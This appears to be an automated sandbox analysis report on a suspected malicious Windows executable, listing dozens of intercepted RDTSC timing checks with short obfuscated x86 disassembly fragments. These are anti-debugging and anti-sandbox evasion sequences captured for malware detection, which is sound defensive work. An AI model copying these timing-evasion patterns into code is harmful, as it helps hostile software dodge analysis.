                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002F4586 second address: 000000000016F99D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 0EF8BCAAh 0x0000000e adc cl, 00000001h 0x00000011 push dword ptr [ebp+122D0FD1h] 0x00000017 jmp 00007F7E95376677h 0x0000001c call dword ptr [ebp+122D2E8Ah] 0x00000022 pushad 0x00000023 pushad 0x00000024 or edx, 3C219123h 0x0000002a and eax, dword ptr [ebp+122D3885h] 0x00000030 popad 0x00000031 mov dword ptr [ebp+122D2E6Ah], ebx 0x00000037 xor eax, eax 0x00000039 jmp 00007F7E95376673h 0x0000003e mov edx, dword ptr [esp+28h] 0x00000042 mov dword ptr [ebp+122D2D51h], ecx 0x00000048 mov dword ptr [ebp+122D38B1h], eax 0x0000004e cld 0x0000004f mov esi, 0000003Ch 0x00000054 cmc 0x00000055 add esi, dword ptr [esp+24h] 0x00000059 jmp 00007F7E95376678h 0x0000005e lodsw 0x00000060 jmp 00007F7E95376675h 0x00000065 add eax, dword ptr [esp+24h] 0x00000069 jmp 00007F7E95376674h 0x0000006e mov ebx, dword ptr [esp+24h] 0x00000072 cld 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 pushad 0x00000079 popad 0x0000007a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002F4814 second address: 00000000002F4818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002F4818 second address: 00000000002F4822 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7E95376666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002F4822 second address: 00000000002F484A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F7E95068B39h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002F484A second address: 00000000002F484E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002F484E second address: 00000000002F485C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F7E95068B26h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002F485C second address: 00000000002F4860 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002F4860 second address: 00000000002F48DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 js 00007F7E954D64C6h 0x0000000f pushad 0x00000010 js 00007F7E954D64A6h 0x00000016 jmp 00007F7E954D64B8h 0x0000001b popad 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 ja 00007F7E954D64B0h 0x00000026 pop eax 0x00000027 mov esi, dword ptr [ebp+122D3649h] 0x0000002d lea ebx, dword ptr [ebp+124584B5h] 0x00000033 call 00007F7E954D64B2h 0x00000038 jmp 00007F7E954D64B2h 0x0000003d pop edi 0x0000003e xchg eax, ebx 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002F48DB second address: 00000000002F48E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F7E95375CF6h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000314580 second address: 00000000003145A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7E954D64AFh 0x00000010 jne 00007F7E954D64A6h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003145A0 second address: 00000000003145AE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7E95375CF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003145AE second address: 00000000003145B4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003145B4 second address: 00000000003145BE instructions: 0x00000000 rdtsc 0x00000002 js 00007F7E95375CFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002D45D7 second address: 00000000002D45DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002D45DB second address: 00000000002D45DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002D45DF second address: 00000000002D45E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002D45E5 second address: 00000000002D4608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7E95375D01h 0x0000000c push eax 0x0000000d pop eax 0x0000000e jns 00007F7E95375CF6h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002D4608 second address: 00000000002D4612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F7E954D64A6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003124CB second address: 00000000003124E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E95375D08h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003124E7 second address: 00000000003124EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003124EB second address: 00000000003124F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000031263C second address: 0000000000312642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000031279C second address: 00000000003127B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7E95375CF6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7E95375CFFh 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000312ECB second address: 0000000000312ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000313039 second address: 000000000031303D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000031303D second address: 0000000000313055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7E954D64AFh 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000313055 second address: 0000000000313060 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F7E95375CF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003131AD second address: 00000000003131BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F7E954D64A8h 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003131BA second address: 00000000003131CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E95375CFFh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000313641 second address: 0000000000313646 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003078E6 second address: 0000000000307901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E95375D01h 0x00000009 jno 00007F7E95375CF6h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000307901 second address: 0000000000307905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000307905 second address: 000000000030792F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7E95375D07h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 je 00007F7E95375CF6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000030792F second address: 000000000030793F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F7E954D64ABh 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000313CDC second address: 0000000000313CF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F7E95375CFFh 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000313F58 second address: 0000000000313F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000313F5E second address: 0000000000313F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7E95375CF6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7E95375CFCh 0x00000012 jp 00007F7E95375CF6h 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000313F7D second address: 0000000000313F98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7E954D64B5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000313F98 second address: 0000000000313FBC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7E95375D0Bh 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F7E95375D03h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000313FBC second address: 0000000000313FC9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7E954D64A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003143BA second address: 00000000003143BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003143BE second address: 00000000003143CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E954D64ABh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003143CF second address: 0000000000314435 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7E95375D00h 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F7E95375D09h 0x0000000f popad 0x00000010 jmp 00007F7E95375D00h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 je 00007F7E95375D0Ah 0x0000001e push eax 0x0000001f push edx 0x00000020 jns 00007F7E95375CF6h 0x00000026 push edx 0x00000027 pop edx 0x00000028 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000031D49F second address: 000000000031D4C7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7E954D64A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jng 00007F7E954D64AEh 0x00000012 push ecx 0x00000013 ja 00007F7E954D64A6h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jne 00007F7E954D64A8h 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000031D5A2 second address: 000000000031D5A7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000322133 second address: 000000000032213C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032213C second address: 0000000000322142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000322142 second address: 0000000000322146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032150A second address: 0000000000321513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000321513 second address: 000000000032151F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7E954D64A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032151F second address: 0000000000321525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000321525 second address: 0000000000321529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000321529 second address: 000000000032152D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032152D second address: 0000000000321549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E954D64B2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032168C second address: 00000000003216FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7E95375CF6h 0x0000000a jnl 00007F7E95375D07h 0x00000010 pushad 0x00000011 jmp 00007F7E95375D07h 0x00000016 jp 00007F7E95375CF6h 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f jnp 00007F7E95375D0Fh 0x00000025 jmp 00007F7E95375D09h 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F7E95375CFFh 0x00000032 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003216FF second address: 0000000000321704 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000321704 second address: 000000000032170F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032170F second address: 0000000000321713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000321A01 second address: 0000000000321A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000321E5F second address: 0000000000321E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000321E64 second address: 0000000000321E6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003227B8 second address: 00000000003227BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003227BC second address: 00000000003227CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F7E95375CF6h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000322F60 second address: 0000000000322F66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000323034 second address: 0000000000323038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000323408 second address: 0000000000323412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F7E954D64A6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003236CE second address: 00000000003236D8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7E95375CFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000323832 second address: 0000000000323836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003238FC second address: 000000000032390A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F7E95375CFCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032390A second address: 000000000032391A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F7E954D64A8h 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000323F76 second address: 0000000000323F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000323F81 second address: 0000000000323FEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F7E954D64A8h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 jne 00007F7E954D64AAh 0x0000002b push 00000000h 0x0000002d sbb si, D2E4h 0x00000032 sbb esi, 24FF000Dh 0x00000038 push 00000000h 0x0000003a mov edi, dword ptr [ebp+122D359Dh] 0x00000040 push eax 0x00000041 push edi 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F7E954D64ACh 0x00000049 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000323FEE second address: 0000000000323FF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003247F5 second address: 00000000003247FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003247FB second address: 00000000003247FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003247FF second address: 0000000000324803 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000328220 second address: 0000000000328227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032C660 second address: 000000000032C724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E954D64B7h 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov bx, cx 0x00000011 push dword ptr fs:[00000000h] 0x00000018 jmp 00007F7E954D64AEh 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push ebp 0x00000027 call 00007F7E954D64A8h 0x0000002c pop ebp 0x0000002d mov dword ptr [esp+04h], ebp 0x00000031 add dword ptr [esp+04h], 0000001Dh 0x00000039 inc ebp 0x0000003a push ebp 0x0000003b ret 0x0000003c pop ebp 0x0000003d ret 0x0000003e sbb bx, F3C4h 0x00000043 mov eax, dword ptr [ebp+122D0D95h] 0x00000049 push 00000000h 0x0000004b push ebx 0x0000004c call 00007F7E954D64A8h 0x00000051 pop ebx 0x00000052 mov dword ptr [esp+04h], ebx 0x00000056 add dword ptr [esp+04h], 00000015h 0x0000005e inc ebx 0x0000005f push ebx 0x00000060 ret 0x00000061 pop ebx 0x00000062 ret 0x00000063 ja 00007F7E954D64AFh 0x00000069 push FFFFFFFFh 0x0000006b nop 0x0000006c push edx 0x0000006d jmp 00007F7E954D64AEh 0x00000072 pop edx 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 push esi 0x00000078 pop esi 0x00000079 jmp 00007F7E954D64AFh 0x0000007e popad 0x0000007f rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032D47C second address: 000000000032D511 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007F7E95375CF6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F7E95375CF8h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 or bh, FFFFFFDAh 0x0000002c cld 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 call 00007F7E95375CF8h 0x00000037 pop edi 0x00000038 mov dword ptr [esp+04h], edi 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc edi 0x00000045 push edi 0x00000046 ret 0x00000047 pop edi 0x00000048 ret 0x00000049 call 00007F7E95375D00h 0x0000004e add dword ptr [ebp+122D34DFh], ebx 0x00000054 pop edi 0x00000055 push 00000000h 0x00000057 xchg eax, esi 0x00000058 jmp 00007F7E95375CFAh 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push esi 0x00000061 jmp 00007F7E95375D08h 0x00000066 pop esi 0x00000067 rdtsc
